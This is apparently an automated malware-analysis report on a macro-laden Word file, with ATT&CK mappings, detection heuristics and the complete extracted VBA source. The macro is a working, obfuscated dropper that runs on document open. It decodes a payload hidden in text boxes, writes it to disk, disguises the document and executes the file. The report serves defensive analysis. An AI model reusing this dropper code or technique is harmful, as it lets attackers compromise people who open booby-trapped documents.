MALICIOUS
Risk Score: 108
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1105 Ingress Tool Transfer
T1204.002 Malicious File
The sample contains VBA macros, including an AutoOpen subroutine, which is a common technique for executing malicious code upon document opening. The script utilizes Base64 decoding and XOR obfuscation to hide its payload, which is then likely executed via CreateObject. This indicates the document is designed to download and run a secondary malicious component.
Heuristics 4
- VBA macros detected (medium, 3 related findings): OLE_VBA_MACROS. Document contains VBA macro code.
- CreateObject call (high): OLE_VBA_CREATEOBJ. Matched line in script: Set xmlDoc = CreateObject("MSXML2.DOMDocument")
- VBA p-code auto-exec with execution tokens (high): OLE_VBA_PCODE_AUTOEXEC_EXEC. Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low): OLE_VBA_AUTOOPEN. Matched line in script: Sub AutoOpen()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2918 bytes |

SHA-256: 53eaadad198752eaaf33f8504dd37e174992c8ac25ebe53bf3e471a3ba748521

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Private Function Base64Decode(base64 As String) As Variant
Dim xmlDoc As Object
Dim xmlNode As Object
Set xmlDoc = CreateObject("MSXML2.DOMDocument")
Set xmlNode = xmlDoc.createElement("b64")
xmlNode.dataType = "bin.base64"
xmlNode.Text = base64
Base64Decode = xmlNode.nodeTypedValue
End Function
Private Function GetStringData(data As String) As String
Dim decData As Variant
Dim nLen As Long
Dim strPath As String
decData = Base64Decode(data)
nLen = UBound(decData) - LBound(decData) + 1
strPath = ""
For inx = 0 To nLen - 1
strPath = strPath & Chr((decData(inx) Xor 37) + 134 - 256)
Next inx
GetStringData = strPath
End Function
Private Function GetBufferData(data As String) As Variant
Dim decData As Variant
Dim nLen As Long
decData = Base64Decode(data)
nLen = UBound(decData) - LBound(decData) + 1
For inx = 0 To nLen - 1
If ((decData(inx) Xor 214) + 55) > 255 Then
decData(inx) = (decData(inx) Xor 214) + 55 - 256
Else
decData(inx) = (decData(inx) Xor 214) + 55
End If
Next inx
GetBufferData = decData
End Function
Sub AutoOpen()
'
' AutoOpen Macro
'
'
Dim strPath As String
Dim strArgment As String
Dim DataBuffer As Variant
Dim PBuffer() As Byte
Dim strObject As String
If ActiveDocument.Shapes.Count < 1 Then Exit Sub
strPath = GetStringData(ActiveDocument.Shapes("Text Box 3").TextFrame.TextRange.Text)
strArgment = GetStringData(ActiveDocument.Shapes("Text Box 4").TextFrame.TextRange.Text)
DataBuffer = GetBufferData(ActiveDocument.Shapes("Text Box 5").TextFrame.TextRange.Text)
nLen = UBound(DataBuffer) - LBound(DataBuffer) + 1
strObject = GetStringData(ActiveDocument.Shapes("Text Box 6").TextFrame.TextRange.Text)
ReDim PBuffer(nLen)
For inx = 0 To nLen - 1
PBuffer(inx) = DataBuffer(inx)
Next inx
Open strPath For Binary Lock Write As #1
Put #1, 1, PBuffer
Close #1
ActiveDocument.Shapes("Text Box 2").Select
Selection.ShapeRange.TextFrame.TextRange.Select
Selection.Collapse
Selection.WholeStory
Selection.Copy
Selection.ShapeRange.Select
Selection.MoveUp Unit:=wdScreen, Count:=1
Selection.WholeStory
Selection.Delete Unit:=wdCharacter, Count:=1
Selection.PasteAndFormat (wdFormatOriginalFormatting)
ActiveDocument.Save
Set objShell = CreateObject(strObject)
objShell.Run strArgment, 0, False
Set objShell = Nothing
End Sub